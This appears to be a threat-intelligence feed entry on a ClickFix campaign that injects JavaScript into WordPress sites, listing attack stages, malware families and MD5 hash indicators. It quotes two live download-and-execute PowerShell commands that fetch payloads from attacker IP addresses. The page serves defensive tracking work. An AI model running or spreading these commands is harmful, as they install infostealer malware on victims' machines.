← Back to Pulse Feed
PULSE DETAIL
PULSE NAME
ClickFix / Shadow DOM JS Injection Campaign — Multi-stage infostealer chain targeting WordPress sites
WHITE dispensight 2026-05-13 Modified: 2026-05-20
191
IOCs
HIGH VOLUME
Observed Execution Flow: Stage 1: Initial Access via Browser ---> Clickfix Stage 2: Obfuscated PowerShell Execution ``` Write-Host(iex(irm((('178.'+'16')+('.52.'+'232')))))2>$null ``` Stage 3: Secondary Payload Download A child PowerShell process (PID 4908) spawned by PID 7408 executes: ``` Invoke-WebRequest -Uri "http://158.94.208.92" -UseBasicParsing Invoke-Expression $checkResult.Content ``` Stage 4: Code Compilation and Injection (csc.exe) Stage 5: Payload Execution in svchost.exe & self-deletion when finished Stage 6: Network Communication -> Suricata IDS detects DonutLoader requesting additional payloads from 158.94.208.104:80 Detailed description available at https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf
omegatechAS202412multiple infectionsantianalysisobfuscator.ioevasionClickFixpowershelliexanti-debug
MITRE ATT&CK & Malware Families
ATT&CK TECHNIQUES
MALWARE FAMILIES
Donutloader TR/Rozena.Gen
Indicators of Compromise (12 / 191 total)
All IPv4 URL domain hostname FileHash-MD5 FileHash-SHA1 FileHash-SHA256
TYPEINDICATORDESCRIPTIONCREATED
FileHash-MD5 51b46342163ef37f5f41c269ffb337d3 MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 2026-05-17
FileHash-MD5 7c268bfab0653cdca45b4dc3c1ee0092 MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 2026-05-17
FileHash-MD5 51b46342163ef37f5f41c269ffb337d3 MD5 of 2198767147bdf67a45da63ad9a35900b4ca8e628fedca13873ae50cf5805c810 2026-05-17
FileHash-MD5 7c268bfab0653cdca45b4dc3c1ee0092 MD5 of 88c9a328be9d2f04b3b93d2d95117f3ab3c5403fd0f9c69f8002e74e8edfd3a9 2026-05-17
FileHash-MD5 c43c4bfd2e1a44ef690e6801be2b4099 collected from bryanexhaust.com 2026-05-18
FileHash-MD5 f17ba86cd4acff4ecfa2357c3b1d4b2c 2026-05-18
FileHash-MD5 f29926ae72794dde60ae1d57d97c5781 2026-05-19
FileHash-MD5 ff1d1a915f7a4a1df4a16e0dd2990241 2026-05-19
FileHash-MD5 f29926ae72794dde60ae1d57d97c5781 2026-05-19
FileHash-MD5 ff1d1a915f7a4a1df4a16e0dd2990241 2026-05-19
FileHash-MD5 f29926ae72794dde60ae1d57d97c5781 2026-05-19
FileHash-MD5 ff1d1a915f7a4a1df4a16e0dd2990241 2026-05-19
References (3)
↗ SecureLeaf-ADV-2026-WP-001.pdf ↗ https://secureleaf.dispensight.com/SecureLeaf-ADV-2026-WP-001.pdf